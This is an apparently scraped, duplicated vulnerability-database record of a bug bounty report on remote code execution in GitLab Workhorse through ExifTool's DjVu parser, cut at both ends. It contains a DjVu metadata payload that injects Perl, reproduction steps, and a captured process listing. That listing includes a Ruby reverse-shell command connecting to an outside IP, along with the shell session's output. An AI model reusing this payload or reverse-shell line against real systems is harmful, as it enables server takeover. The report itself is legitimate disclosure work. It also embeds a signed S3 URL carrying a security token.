[raid5wq]\nroot 454 0.0 0.0 0 0 ? S 2020 10:42 [jbd2/sda1-8]\nroot 455 0.0 0.0 0 0 ? I< 2020 0:00 [ext4-rsv-conver]\nroot 515 0.0 0.0 0 0 ? I< 2020 11:09 [kworker/12:1H]\nroot 522 0.0 0.0 0 0 ? I< 2020 0:00 [iscsi_eh]\nroot 525 0.0 0.0 0 0 ? I< 2020 0:00 [ib-comp-wq]\nroot 526 0.0 0.0 0 0 ? I< 2020 0:00 [ib-comp-unb-wq]\nroot 527 0.0 0.0 0 0 ? I< 2020 0:00 [ib_mcast]\nroot 528 0.0 0.0 0 0 ? I< 2020 0:00 [ib_nl_sa_wq]\nroot 531 0.0 0.0 0 0 ? I< 2020 0:00 [rdma_cm]\nroot 542 0.0 0.0 0 0 ? I< 2020 10:56 [kworker/6:1H]\nroot 549 0.0 0.0 0 0 ? I< 2020 0:00 [rpciod]\nroot 550 0.0 0.0 0 0 ? I< 2020 0:00 [xprtiod]\nroot 565 0.0 0.0 102968 824 ? Ss 2020 0:00 /sbin/lvmetad -f\nroot 595 0.0 0.0 42604 3368 ? Ss 2020 2:12 /lib/systemd/systemd-udevd\nroot 596 0.0 0.0 12204 4680 ? Ss 2020 451:18 /usr/sbin/haveged --Foreground --verbose=1 -w 1024\nroot 597 0.0 0.0 97900 38924 ? Ss 2020 113:30 /lib/systemd/systemd-journald\nroot 763 0.0 0.0 0 0 ? S 2020 0:00 [hwrng]\nroot 798 0.0 0.0 0 0 ? I< 2020 1:33 [kworker/13:1H]\nroot 814 0.0 0.0 0 0 ? S 2020 12:32 [jbd2/sdb-8]\nroot 815 0.0 0.0 0 0 ? I< 2020 0:00 [ext4-rsv-conver]\nprometh+ 969 0.6 0.0 720896 31292 ? Sl 2020 1997:39 /opt/prometheus/node_exporter/node_exporter --web.listen-address=:9100 --collector.mountstats --collector.nfs --collector.ntp --collector.textfile.directory=/opt/prometheus/node_exporter/metrics --collector.filesystem.ignored-fs-types=^(autofs|binfmt_misc|bpf|cgroup2?|configfs|debugfs|devpts|devtmpfs|fusectl|hugetlbfs|iso9660|mqueue|nfs.*|nsfs|overlay|proc|procfs|pstore|rpc_pipefs|securityfs|selinuxfs|squashfs|sysfs|tracefs)$ --collector.netstat.fields=^(.*_(InErrors|InErrs)|Ip_Forwarding|Ip(6|Ext)_(InOctets|OutOctets)|Icmp6?_(InMsgs|OutMsgs)|TcpExt_(Listen.*|Syncookies.*|TCPSynRetrans)|Tcp_(ActiveOpens|InSegs|OutSegs|OutRsts|PassiveOpens|RetransSegs|CurrEstab)|Udp6?_(InDatagrams|OutDatagrams|NoPorts|RcvbufErrors|SndbufErrors))$\nroot 1224 0.0 0.0 0 0 ? I< 2020 1:36 [kworker/10:1H]\nroot 1230 0.0 0.0 16124 2920 ? Ss 2020 0:01 /sbin/dhclient -1 -v -pf /run/dhclient.ens4.pid -lf /var/lib/dhcp/dhclient.ens4.leases -I -df /var/lib/dhcp/dhclient6.ens4.leases ens4\nroot 1386 0.0 0.0 5220 112 ? Ss 2020 6:09 /sbin/iscsid\nroot 1389 0.0 0.0 5720 3512 ? S<Ls 2020 29:44 /sbin/iscsid\nroot 1407 0.0 0.0 382660 408 ? Ssl 2020 3:07 /usr/bin/lxcfs /var/lib/lxcfs/\nroot 1426 0.0 0.0 27728 2320 ? Ss 2020 3:41 /usr/sbin/cron -f\nsyslog 1446 0.0 0.0 256392 2112 ? Ssl 2020 56:37 /usr/sbin/rsyslogd -n\nroot 1476 0.0 0.0 28628 2648 ? Ss 2020 0:51 /lib/systemd/systemd-logind\nroot 1512 0.0 0.0 4396 1208 ? Ss 2020 0:00 /usr/sbin/acpid\ndaemon 1525 0.0 0.0 26044 1464 ? Ss 2020 0:00 /usr/sbin/atd -f\npostfix 1570 0.0 0.0 67476 4488 ? S 12:40 0:00 pickup -l -t fifo -u\nroot 1593 0.0 0.0 4392 904 ? Ss 2020 7:41 runsvdir -P /etc/service log: /process HTTP/1.1\" 200 153 - -> /process 10.219.1.10 - - [07/Apr/2021:13:13:54 UTC] \"GET /process HTTP/1.1\" 200 153 - -> /process 10.219.1.9 - - [07/Apr/2021:13:13:58 UTC] \"GET /process HTTP/1.1\" 200 153 - -> /process 10.219.1.10 - - [07/Apr/2021:13:14:09 UTC] \"GET /process HTTP/1.1\" 200 153 - -> /process 10.219.1.9 - - [07/Apr/2021:13:14:13 UTC] \"GET /process HTTP/1.1\" 200 153 - -> /process\ngit 1594 50.1 2.0 2843912 1351680 ? Sl 12:40 17:00 puma: cluster worker 0: 7369 [gitlab-puma-worker]\nmessage+ 1599 0.0 0.0 43028 3356 ? Ss 2020 1:36 /usr/bin/dbus-daemon --system --address=systemd: --nofork --nopidfile --systemd-activation\nroot 1615 0.0 0.0 4240 1200 ? Ss 2020 0:26 runsv apt_metrics\nroot 1617 0.0 0.0 4240 1104 ? Ss 2020 0:03 runsv node_exporter\nroot 1618 0.0 0.0 4240 1104 ? Ss 2020 4:24 runsv ntpd_metrics\nroot 1620 0.0 0.0 4240 380 ? Ss 2020 0:00 runsv gitlab-monitor\nroot 1621 0.0 0.0 4240 388 ? Ss 2020 0:00 runsv mtail\nroot 1623 0.0 0.0 0 0 ? I< 2020 15:18 [kworker/0:1H]\nroot 1624 0.0 0.0 4384 252 ? S 2020 0:04 svlogd -tt /var/log/mtail\nroot 1625 0.0 0.0 4384 380 ? S 2020 0:00 svlogd -tt /var/log/prometheus/node_exporter_apt_metrics\nroot 1626 0.0 0.0 4384 224 ? S 2020 0:00 svlogd -tt /var/log/prometheus/node_exporter_ntpd_metrics\nroot 1627 0.0 0.0 4384 236 ? S 2020 0:02 svlogd -tt /var/log/prometheus/node_exporter\nroot 1628 0.0 0.0 4384 240 ? S 2020 0:00 svlogd -tt /var/log/gitlab-monitor\nroot 1713 0.0 0.0 13372 908 ? Ss 2020 0:02 /sbin/mdadm --monitor --pid-file /run/mdadm/monitor.pid --daemonise --scan --syslog\nroot 1716 0.0 0.0 0 0 ? I< 2020 0:46 [kworker/14:1H]\nroot 1844 0.0 0.0 0 0 ? I< 2020 0:00 [nfsiod]\nroot 1850 0.0 0.0 277088 2224 ? Ssl 2020 0:36 /usr/lib/policykit-1/polkitd --no-debug\nroot 1878 0.0 0.0 0 0 ? I< 2020 5:54 [kworker/2:1H]\nroot 2084 0.0 0.0 0 0 ? I Apr06 0:00 [kworker/6:0]\nroot 2095 0.0 0.0 65512 3084 ? Ss 2020 0:04 /usr/sbin/sshd -D\nroot 2102 0.0 0.0 0 0 ? I< 2020 2:31 [kworker/9:1H]\nroot 2120 0.0 0.0 0 0 ? I< 2020 5:08 [kworker/3:1H]\nroot 2138 0.0 0.0 0 0 ? I< 2020 0:31 [kworker/15:1H]\nroot 2146 0.0 0.0 0 0 ? I< 2020 23:45 [kworker/1:1H]\nroot 2151 0.0 0.0 0 0 ? I< 2020 0:40 [kworker/4:1H]\nroot 2167 0.0 0.0 14656 1372 tty1 Ss+ 2020 0:00 /sbin/agetty --noclear tty1 linux\nroot 2177 0.0 0.0 14472 1556 ttyS0 Ss+ 2020 0:00 /sbin/agetty --keep-baud 115200 38400 9600 ttyS0 vt220\nntp 2204 0.0 0.0 40268 2576 ? Ss 2020 21:06 /usr/sbin/ntpd -p /var/run/ntpd.pid -g -c /var/lib/ntp/ntp.conf.dhcp -u 112:116\nroot 2270 0.0 0.0 67480 18788 ? Ss 2020 17:03 /usr/bin/python3 /usr/bin/google_ip_forwarding_daemon\nroot 2272 0.0 0.0 67220 16368 ? Ss 2020 10:50 /usr/bin/python3 /usr/bin/google_clock_skew_daemon\nroot 2402 0.0 0.0 65408 2460 ? Ss 2020 1:05 /usr/lib/postfix/sbin/master\npostfix 2411 0.0 0.0 67640 1988 ? S 2020 0:23 qmgr -l -t fifo -u\nroot 2571 0.0 0.0 4392 848 ? Ss 2020 2:50 runsvdir -P /opt/gitlab/service log: ...........................................................................................................................................................................................................................................................................................................................................................................................................\nroot 2618 0.0 0.0 4240 1104 ? Ss 2020 0:01 runsv puma\nroot 2621 0.0 0.0 4240 1192 ? Ss 2020 0:05 runsv logrotate\nroot 2623 0.0 0.0 4240 1144 ? Ss 2020 0:00 runsv nginx\nroot 2625 0.0 0.0 4240 1092 ? Ss 2020 0:01 runsv gitlab-workhorse\ngitlab-+ 3150 0.0 0.0 754368 26924 ? Sl Feb17 35:28 /opt/ruby-2.7.0/bin/ruby /opt/gitlab-monitor/bin/gitlab-mon web -c /opt/gitlab-monitor/config/worker-config.yml\nroot 3164 0.0 0.0 0 0 ? I< 2020 0:12 [kworker/11:1H]\nroot 3211 0.2 0.0 0 0 ? I 12:42 0:04 [kworker/u32:2]\nroot 3222 0.0 0.0 0 0 ? I< 2020 0:15 [kworker/7:1H]\nroot 3463 0.0 0.0 0 0 ? I 10:35 0:00 [kworker/5:1]\nroot 3511 0.0 0.0 0 0 ? I 11:40 0:00 [kworker/12:0]\nroot 4032 0.0 0.1 1571276 107596 ? Ssl 2020 172:34 /opt/prometheus/ebpf_exporter/ebpf_exporter --web.listen-address=:9435 --config.file=/opt/prometheus/ebpf_exporter/config.yml\nroot 4171 0.0 0.0 4376 640 ? S 13:12 0:00 sleep 600\nroot 4302 0.0 0.0 0 0 ? I< 2020 2:25 [kworker/5:1H]\nroot 4391 0.0 0.0 0 0 ? I< 2020 0:14 [kworker/8:1H]\nroot 4699 0.0 0.0 0 0 ? I 11:09 0:00 [kworker/13:2]\nroot 4812 0.0 0.0 4376 672 ? S 13:13 0:00 sleep 60\nroot 5375 0.0 0.0 4504 788 ? Ss 13:13 0:00 /bin/sh /opt/gitlab/embedded/bin/gitlab-logrotate-wrapper\nroot 5379 0.0 0.0 4376 748 ? S 13:13 0:00 sleep 600\ngit 5398 49.7 1.9 2661404 1274712 ? Sl 12:44 14:43 puma: cluster worker 3: 7369 [gitlab-puma-worker]\ngit 5544 1.3 0.0 45604 27664 ? S 13:14 0:00 /usr/bin/perl -w /opt/gitlab/embedded/bin/exiftool -all= --IPTC:all --XMP-iptcExt:all -tagsFromFile @ -ResolutionUnit -XResolution -YResolution -YCbCrSubSampling -YCbCrPositioning -BitsPerSample -ImageHeight -ImageWidth -ImageSize -Copyright -CopyrightNotice -Orientation -\ngit 5545 0.0 0.0 0 0 ? Z 13:14 0:00 [sh] <defunct>\ngit 5551 0.0 0.0 105260 10840 ? S 13:14 0:00 ruby -rsocket -e exit if fork;c=TCPSocket.new(\"103.3.61.137\",12345);while(cmd=c.gets);IO.popen(cmd,\"r\"){|io|c.print io.read}end\ngit 5667 0.0 0.0 4504 740 ? S 13:14 0:00 sh -c ps auxww\ngit 5668 0.0 0.0 34424 2864 ? R 13:14 0:00 ps auxww\nroot 5952 0.0 0.0 0 0 ? I 00:24 0:00 [kworker/5:2]\nroot 6812 0.0 0.0 54640 7080 ? Ss Mar08 0:00 nginx: master process /opt/gitlab/embedded/sbin/nginx -p /var/opt/gitlab/nginx\ngitlab-+ 6813 0.0 0.0 59476 12544 ? S Mar08 18:42 nginx: worker process\ngitlab-+ 6814 0.0 0.0 59380 13704 ? S Mar08 18:28 nginx: worker process\ngitlab-+ 6815 0.0 0.0 59504 13088 ? S Mar08 18:57 nginx: worker process\ngitlab-+ 6816 0.0 0.0 59456 13048 ? S Mar08 19:35 nginx: worker process\ngitlab-+ 6817 0.0 0.0 59468 13396 ? S Mar08 18:41 nginx: worker process\ngitlab-+ 6818 0.0 0.0 59508 13700 ? S Mar08 20:20 nginx: worker process\ngitlab-+ 6819 0.0 0.0 59492 13220 ? S Mar08 19:33 nginx: worker process\ngitlab-+ 6820 0.0 0.0 59460 13420 ? S Mar08 22:00 nginx: worker process\ngitlab-+ 6821 0.0 0.0 59508 13420 ? S Mar08 24:15 nginx: worker process\ngitlab-+ 6822 0.0 0.0 59500 13348 ? S Mar08 20:53 nginx: worker process\ngitlab-+ 6823 0.0 0.0 59660 13588 ? S Mar08 27:47 nginx: worker process\ngitlab-+ 6824 0.0 0.0 59972 14116 ? S Mar08 37:52 nginx: worker process\ngitlab-+ 6825 4.0 0.0 63940 18592 ? S Mar08 1788:21 nginx: worker process\ngitlab-+ 6826 1.9 0.0 61436 15808 ? S Mar08 854:41 nginx: worker process\ngitlab-+ 6827 0.1 0.0 60120 14564 ? S Mar08 79:52 nginx: worker process\ngitlab-+ 6828 0.8 0.0 62348 16532 ? S Mar08 351:59 nginx: worker process\ngitlab-+ 6829 0.0 0.0 54836 3732 ? S Mar08 0:08 nginx: cache manager process\ngit 6952 17.6 0.1 1532460 109784 ? Ssl 10:04 33:35 /opt/gitlab/embedded/bin/gitlab-workhorse -listenNetwork unix -listenUmask 0 -listenAddr /var/opt/gitlab/gitlab-workhorse/sockets/socket -authBackend http://localhost:8080 -authSocket /var/opt/gitlab/gitlab-rails/sockets/gitlab.socket -documentRoot /opt/gitlab/embedded/service/gitlab-rails/public -pprofListenAddr -apiLimit 5 -apiQueueDuration 60s -apiQueueLimit 200 -prometheusListenAddr 0.0.0.0:9229 -secretPath /opt/gitlab/embedded/service/gitlab-rails/.gitlab_workhorse_secret -logFormat json -config config.toml\ngit 7369 10.3 1.5 1859556 1033020 ? Ssl 10:04 19:41 puma 5.1.1 (unix:///var/opt/gitlab/gitlab-rails/sockets/gitlab.socket,tcp://0.0.0.0:8080) [gitlab-puma-worker]\nroot 7522 0.0 0.0 0 0 ? I 10:04 0:00 [kworker/11:2]\nroot 8263 0.0 0.0 0 0 ? I 12:15 0:00 [kworker/14:0]\nroot 8266 0.0 0.0 0 0 ? I 08:19 0:00 [kworker/0:2]\nroot 8581 0.1 0.0 0 0 ? I 12:48 0:02 [kworker/u32:1]\nroot 9122 0.0 0.0 0 0 ? I 10:37 0:00 [kworker/8:0]\ngit 9978 47.0 2.0 3182348 1362056 ? Sl 11:43 42:45 puma: cluster worker 8: 7369 [gitlab-puma-worker]\nconsul 10871 0.5 0.2 257480 143704 ? Ssl 2020 2836:38 /opt/consul/1.7.2/consul agent -config-file=/etc/consul/consul.json -config-dir=/etc/consul/conf.d\ngit 10980 51.1 1.8 2507012 1229264 ? Sl 12:49 12:43 puma: cluster worker 2: 7369 [gitlab-puma-worker]\ninfluxd+ 12182 0.0 0.0 188928 1044 ? Ssl 2020 0:14 /usr/bin/influxdb-relay -config /etc/influxdb-relay/influxdb-relay.conf\nroot 12322 0.0 0.0 0 0 ? I 12:49 0:00 [kworker/11:1]\nroot 12828 0.0 0.0 4384 1276 ? S 2020 0:01 svlogd -tt /var/log/gitlab/puma\nroot 12831 0.2 0.0 4384 1228 ? S 2020 1318:06 svlogd /var/log/gitlab/gitlab-workhorse\nroot 12853 0.0 0.0 4384 1260 ? S 2020 0:02 svlogd -tt /var/log/gitlab/nginx\nroot 12856 0.0 0.0 4384 340 ? S 2020 0:00 svlogd -tt /var/log/gitlab/logrotate\ngit 13196 48.0 2.1 2935068 1437312 ? Sl 12:17 27:28 puma: cluster worker 10: 7369 [gitlab-puma-worker]\nroot 13379 0.0 0.0 0 0 ? I 09:53 0:00 [kworker/7:1]\nroot 13382 0.0 0.0 0 0 ? I 09:53 0:00 [kworker/10:1]\nroot 13611 1.0 0.0 1740892 38864 ? Ssl Jan29 1042:19 /usr/bin/process-exporter --config.path /etc/process-exporter/chef-configured.yaml --web.listen-address=:9256 -threads=false -gather-smaps=false\nroot 14478 0.0 0.0 0 0 ? I 09:24 0:00 [kworker/2:0]\ngit 17155 50.3 1.8 2541576 1218444 ? Sl 12:50 11:50 puma: cluster worker 15: 7369 [gitlab-puma-worker]\nroot 17904 0.0 0.0 0 0 ? I 09:59 0:00 [kworker/2:2]\ngit 21109 48.3 1.9 2572804 1258580 ? Sl 12:55 9:17 puma: cluster worker 5: 7369 [gitlab-puma-worker]\nroot 21296 0.0 0.0 0 0 ? I 10:52 0:00 [kworker/8:1]\nroot 21299 0.0 0.0 0 0 ? I 10:52 0:00 [kworker/1:0]\nroot 21301 0.0 0.0 0 0 ? I 10:52 0:00 [kworker/7:0]\nroot 21306 0.0 0.0 0 0 ? I 10:52 0:00 [kworker/15:1]\nroot 21376 0.0 0.0 0 0 ? I 09:59 0:00 [kworker/9:0]\ngit 21698 48.0 2.2 3093788 1459416 ? Sl 12:26 23:00 puma: cluster worker 9: 7369 [gitlab-puma-worker]\nroot 22003 0.2 0.0 0 0 ? I 12:26 0:05 [kworker/u32:3]\nroot 22131 0.0 0.0 0 0 ? I 11:57 0:00 [kworker/9:2]\nroot 22135 0.0 0.0 0 0 ? I 11:57 0:00 [kworker/4:2]\nroot 22142 0.0 0.0 0 0 ? I 11:57 0:00 [kworker/12:3]\nroot 22143 0.0 0.0 0 0 ? I 11:57 0:00 [kworker/3:1]\nroot 22144 0.0 0.0 0 0 ? I 11:57 0:00 [kworker/13:0]\nroot 22863 0.0 0.0 161112 54712 ? Ssl Jan18 0:15 /opt/chef/embedded/bin/ruby --disable-gems /usr/bin/chef-client -c /etc/chef/client.rb -i 1800 -s 300\nroot 24237 0.0 0.0 288904 59208 ? Sl Mar10 6:50 /opt/td-agent/bin/ruby /opt/td-agent/bin/fluentd --log /var/log/td-agent/td-agent.log --daemon /var/run/td-agent/td-agent.pid\nroot 24242 20.6 0.5 3044156 391860 ? Sl Mar10 8337:18 /opt/td-agent/bin/ruby -Eascii-8bit:ascii-8bit /opt/td-agent/bin/fluentd --log /var/log/td-agent/td-agent.log --daemon /var/run/td-agent/td-agent.pid --under-supervisor\ngit 24253 51.3 2.0 2857244 1349560 ? Sl 12:29 23:03 puma: cluster worker 13: 7369 [gitlab-puma-worker]\nroot 24667 0.1 0.0 0 0 ? I 11:29 0:11 [kworker/u32:4]\nroot 24911 0.0 0.0 0 0 ? I Apr06 0:00 [kworker/6:2]\nroot 25156 0.2 0.0 0 0 ? I 12:59 0:01 [kworker/u32:5]\nroot 25516 0.0 0.0 0 0 ? I 07:36 0:00 [kworker/1:1]\ngit 25517 50.4 2.1 2870560 1443204 ? Sl 12:30 21:58 puma: cluster worker 6: 7369 [gitlab-puma-worker]\ngit 25521 49.9 1.8 2550792 1218900 ? Sl 13:00 7:06 puma: cluster worker 4: 7369 [gitlab-puma-worker]\nroot 25525 0.0 0.0 0 0 ? I 07:36 0:00 [kworker/3:2]\nroot 25527 0.0 0.0 0 0 ? I 07:36 0:00 [kworker/15:2]\nroot 26983 0.0 0.0 0 0 ? I Apr06 0:00 [kworker/10:2]\nroot 27893 0.0 0.0 0 0 ? I< 2020 0:00 [xfsalloc]\nroot 27894 0.0 0.0 0 0 ? I< 2020 0:00 [xfs_mru_cache]\ngit 28051 49.9 1.8 2635012 1248076 ? Sl 13:03 5:34 puma: cluster worker 11: 7369 [gitlab-puma-worker]\ngit 28140 50.3 2.1 2943756 1397844 ? Sl 12:33 20:26 puma: cluster worker 14: 7369 [gitlab-puma-worker]\ngit 29132 49.0 2.0 3164444 1367952 ? Sl 12:05 33:39 puma: cluster worker 1: 7369 [gitlab-puma-worker]\nroot 30224 0.0 0.0 0 0 ? I 06:02 0:00 [kworker/14:1]\nroot 30233 0.0 0.0 0 0 ? I 06:02 0:00 [kworker/0:1]\nroot 31940 0.0 0.0 278944 10648 ? Ssl 2020 6:14 /usr/lib/accountsservice/accounts-daemon\nroot 32135 0.1 0.0 0 0 ? I 13:07 0:00 [kworker/u32:0]\nroot 32388 0.0 0.0 0 0 ? I 01:32 0:00 [kworker/4:0]\nroot 32453 5.3 0.0 1774984 40780 ? Sl 2020 13156:17 /opt/prometheus/mtail/mtail -progs /opt/prometheus/mtail/progs -logs /var/log/apt/term.log,/var/log/syslog,/var/log/td-agent/td-agent.log,/var/log/gitlab/gitlab-rails/*.log,/var/log/gitlab/unicorn/unicorn_stderr.log,/var/log/gitlab/unicorn/unicorn_stdout.log -logtostderr\ngit 32635 49.4 2.1 3154204 1401116 ? Sl 12:09 31:54 puma: cluster worker 12: 7369 [gitlab-puma-worker]\ngit 32703 48.7 1.8 2402308 1195496 ? Sl 13:08 3:01 puma: cluster worker 7: 7369 [gitlab-puma-worker]\nexit\n```\n\n\n### Impact\n* Anyone with the ability to upload an image that goes through the GitLab Workhorse could achieve RCE via a specially crafted file\n\n### Examples\n{F1257008}\n{F1257009}\n\n### What is the current *bug* behavior?\nGitLab Workhorse will pass any file to ExifTool, greatly increasing the attack surface. The current bug is in the DjVu module of `ExifTool` which should ideally not ever be hit.\n\n### What is the expected *correct* behavior?\n* There must be better ways of convert C escape sequences than using `eval`\n* Only the TIFF and JPEG modules should be used\n* GitLab Workhorse could check if the file is a valid TIFF of JPEG before passing it to ExifTool\n\n### Output of checks\nThis bug happens on GitLab.com\n\n#### Results of GitLab environment info\n```\nSystem information\nSystem:\nProxy:\t\tno\nCurrent User:\tgit\nUsing RVM:\tno\nRuby Version:\t2.7.2p137\nGem Version:\t3.1.4\nBundler Version:2.1.4\nRake Version:\t13.0.3\nRedis Version:\t6.0.10\nGit Version:\t2.29.0\nSidekiq Version:5.2.9\nGo Version:\tunknown\n\nGitLab information\nVersion:\t13.10.2-ee\nRevision:\tcc4224220e6\nDirectory:\t/opt/gitlab/embedded/service/gitlab-rails\nDB Adapter:\tPostgreSQL\nDB Version:\t12.6\nURL:\t\thttp://192.168.0.127:9080\nHTTP Clone URL:\thttp://192.168.0.127:9080/some-group/some-project.git\nSSH Clone URL:\tgit@192.168.0.127:some-group/some-project.git\nElasticsearch:\tno\nGeo:\t\tno\nUsing LDAP:\tno\nUsing Omniauth:\tyes\nOmniauth Providers:\n\nGitLab Shell\nVersion:\t13.17.0\nRepository storage paths:\n- default: \t/var/opt/gitlab/git-data/repositories\nGitLab Shell path:\t\t/opt/gitlab/embedded/service/gitlab-shell\nGit:\t\t/opt/gitlab/embedded/bin/git\n```\n\n## Impact\n\n* Anyone with the ability to upload an image that goes through the GitLab Workhorse could achieve RCE via a specially crafted file", "published": "2021-04-07T13:59:49", "modified": "2021-05-14T20:08:32", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "https://hackerone.com/reports/1154542", "reporter": "vakzz", "references": [], "cvelist": [], "immutableFields": [], "lastseen": "2021-05-14T22:31:02", "history": [], "viewCount": 1, "enchantments": {"dependencies": {"references": [], "modified": "2021-05-14T22:31:02", "rev": 2}, "score": {"value": -0.1, "vector": "NONE", "modified": "2021-05-14T22:31:02", "rev": 2}}, "objectVersion": "1.5", "bounty": 20000.0, "bountyState": "resolved", "h1team": {"url": "https://hackerone.com/gitlab", "handle": "gitlab", "profile_picture_urls": {"small": "https://profile-photos.hackerone-user-content.com/variants/000/000/264/8dd359f496ba6c5b97c5126dc86924a00fd7ef26_original.png/00311c7541dfa131115f58f065f11f090f520e0a33b1f347ea385ca21df6c866", "medium": "https://profile-photos.hackerone-user-content.com/variants/000/000/264/8dd359f496ba6c5b97c5126dc86924a00fd7ef26_original.png/a15c8fdab95ed5efd5f3d61e531298869f767d9203f8ea9df2bac929a5d32138"}}, "h1reporter": {"disabled": false, "username": "vakzz", "url": "/vakzz", "profile_picture_urls": {"small": "https://hackerone-us-west-2-production-attachments.s3.us-west-2.amazonaws.com/variants/6zbovkumst7oljmo9v21pig3yh9j/00311c7541dfa131115f58f065f11f090f520e0a33b1f347ea385ca21df6c866?response-content-disposition=inline%3B%20filename%3D%2294971b5a75a669ea52903c09fc847f3434930258211181557be06162f5a8bac0.jpg%22%3B%20filename%2A%3DUTF-8%27%2794971b5a75a669ea52903c09fc847f3434930258211181557be06162f5a8bac0.jpg&response-content-type=image%2Fjpeg&X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=ASIAQGK6FURQRSHORSM3%2F20210514%2Fus-west-2%2Fs3%2Faws4_request&X-Amz-Date=20210514T223101Z&X-Amz-Expires=3600&X-Amz-SignedHeaders=host&X-Amz-Security-Token=IQoJb3JpZ2luX2VjEGsaCXVzLXdlc3QtMiJHMEUCIQDVLnOayk4dnt2IQWgpV2ra5A7NUT5DlSpIaRczXO8ekQIgJwhRG7%2BwtCq4CWbpO58iJCNUxTHHr5eN%2BZLBBSbr12kqgwQI9P%2F%2F%2F%2F%2F%2F%2F%2F%2F%2FARACGgwwMTM2MTkyNzQ4NDkiDIvaDkw5qXo%2BFanZLirXAyQndX5hMkHqWHLvEETYUkv%2BjPkz8R1lYZn3Ul8KRUA3%2BpaDX7txmDfw0gKBXLoAUtxY3GGR1YIlGqhiepRBDx4hQlsS3VNYndzSQYk6Ab3ua0VI8taYdSyi0Rzuysv7gXKCNdUFbShaDGygUCilBIX0r3a2BXxGW3ydxQmkWsugqYvvJl6z3EZn9g2CEQzqZlizBlHhKzRw4pitAhOaFRS6vcpNALzlnX7T2%2B%2FjwDwxDBm5dVkm0NXH6nhEc6GkZak6m%2BSZcG%2FHgEzJb4%2BOvDExSB%2F2URdmCjf%2Bq%2FDecht7jsMz1qA2rP9MeYipVX4riJE8BXEtknfiB7ZyqyqeKjpL4z%2BVolDmjGwOCurP250A4CM4FiwZXII3kDOQfItRH1Du392iyN86U0sTzsZEhEbzDEG5lkFCFXO0sPNk%2B1NjY98AtNSYxixzCHmd3laoOReBttcqSymknqmHClTIhXYHhDKm31rhpPg3ItHFla3adHUzj4JUuerbuBsa%2FKWo3B9tnnH4dmfPJOx3Rixa2fJs6ytZRABujza7shTZixISkuglUdfnRUx2yOELXeCxIy0jm%2Bq7BQOPFMpVw%2FVSPL3pFseFPyMVQPrroYOBJ1i7pxUgF2Gf1zDfkPuEBjqlAf%2Fub5xzQHgddpsMmVjM67O2YhOE81uejkG0dtNSM0UZ9vqrgxzvDfDpcrN6HI83d4TpagJFiR9ZmPz34zqm10nT3ls2kxRj3BwjgylUZXxwwyIwFfbR84%2Fwj3YX1k7j%2FYll%2FffBkPMXKb2AUeG8TJWYksMQWXuigPtleT9P0WHzEcBi7Ys%2FTHWcfllJPbJQdvepKu%2Brg915L5a39b2%2BOgSkKze5Lw%3D%3D&X-Amz-Signature=517d5cb8cdfc829668da1b58d7f12ebd1fa17f241f41793df5393e06396b446c"}, "is_me?": false, "cleared": true, "hackerone_triager": false, "hacker_mediation": false}}, "lastseen": "2021-05-14T22:31:02", "differentElements": ["h1reporter"], "edition": 3}, {"bulletin": {"id": "H1:1154542", "hash": "102747b8a2a35df5ac25cbfde8c62352", "type": "hackerone", "bulletinFamily": "bugbounty", "title": "GitLab: RCE when removing metadata with ExifTool", "description": "### Summary\nWhen uploading image files, GitLab Workhorse passes any files with the extensions [jpg|jpeg|tiff](https://gitlab.com/gitlab-org/gitlab/-/blob/v13.10.2-ee/workhorse/internal/upload/exif/exif.go#L104) through to [ExifTool](https://exiftool.org/) to remove any non-whitelisted tags.\n\nAn issue with this is that ExifTool will ignore the file extension and try to determine what the file is based on the content, allowing for any of the supported parsers to be hit instead of just JPEG and TIFF by just renaming the uploaded file.\n\nOne of the supported formats is [DjVu](https://github.com/exiftool/exiftool/blob/11.70/lib/Image/ExifTool/DjVu.pm). When parsing the DjVu annotation, the [tokens are evaled](https://github.com/exiftool/exiftool/blob/11.70/lib/Image/ExifTool/DjVu.pm#L233) to \"convert C escape sequences\". \n\nThere is some validation to try and ensure that everything is properly escaped, but a backslash followed by a newline is correctly handled allowing the quotes to be closed and arbitrary perl inserted and evaluated:\n\n```\n(metadata\n\t(Copyright \"\\\n\" . qx{echo vakzz >/tmp/vakzz} . \\\n\" b \") )\n```\n\n{F1257008} is an example DjVu file with the above metadata, and {F1257009} is an example that runs a reverse shell.\n\n### Steps to reproduce\n1. Download {F1257008} and unzip it\n1. Create a new snippet\n1. In the description field, hit \"Attach a file\"\n1. Select and uplaod `echo_vakzz.jpg`\n1. See that the file `/tmp/vakzz` has been created on the server\n\n\nUploading {F1257009} to https://gitlab.com/-/snippets/new resulted in a shell on `web-09-sv-gprd`:\n\n```\nConnection from [34.74.90.73] port 12345 [tcp/*] accepted (family 2, sport 17073)\nid\nuid=500(git) gid=500(git) groups=500(git)\nhostname -a\nweb-09-sv-gprd\nps auxww\nUSER PID %CPU %MEM VSZ RSS TTY STAT START TIME COMMAND\nroot 1 0.0 0.0 185524 5496 ? Ss 2020 28:31 /sbin/init\nroot 2 0.0 0.0 0 0 ? S 2020 1:44 [kthreadd]\nroot 4 0.0 0.0 0 0 ? I< 2020 0:00 [kworker/0:0H]\nroot 6 0.0 0.0 0 0 ? I< 2020 0:00 [mm_percpu_wq]\nroot 7 0.0 0.0 0 0 ? S 2020 22:50 [ksoftirqd/0]\nroot 8 0.1 0.0 0 0 ? I 2020 552:25 [rcu_sched]\nroot 9 0.0 0.0 0 0 ? I 2020 0:00 [rcu_bh]\nroot 10 0.0 0.0 0 0 ? S 2020 1:05 [migration/0]\nroot 11 0.0 0.0 0 0 ? S 2020 1:05 [watchdog/0]\nroot 12 0.0 0.0 0 0 ? S 2020 0:00 [cpuhp/0]\nroot 13 0.0 0.0 0 0 ? S 2020 0:00 [cpuhp/1]\nroot 14 0.0 0.0 0 0 ? S 2020 1:07 [watchdog/1]\nroot 15 0.0 0.0 0 0 ? S 2020 1:03 [migration/1]\nroot 16 0.0 0.0 0 0 ? S 2020 20:27 [ksoftirqd/1]\nroot 18 0.0 0.0 0 0 ? I< 2020 0:00 [kworker/1:0H]\nroot 19 0.0 0.0 0 0 ? S 2020 0:00 [cpuhp/2]\nroot 20 0.0 0.0 0 0 ? S 2020 1:05 [watchdog/2]\nroot 21 0.0 0.0 0 0 ? S 2020 1:04 [migration/2]\nroot 22 0.0 0.0 0 0 ? S 2020 18:14 [ksoftirqd/2]\nroot 24 0.0 0.0 0 0 ? I< 2020 0:00 [kworker/2:0H]\nroot 25 0.0 0.0 0 0 ? S 2020 0:00 [cpuhp/3]\nroot 26 0.0 0.0 0 0 ? S 2020 1:07 [watchdog/3]\nroot 27 0.0 0.0 0 0 ? S 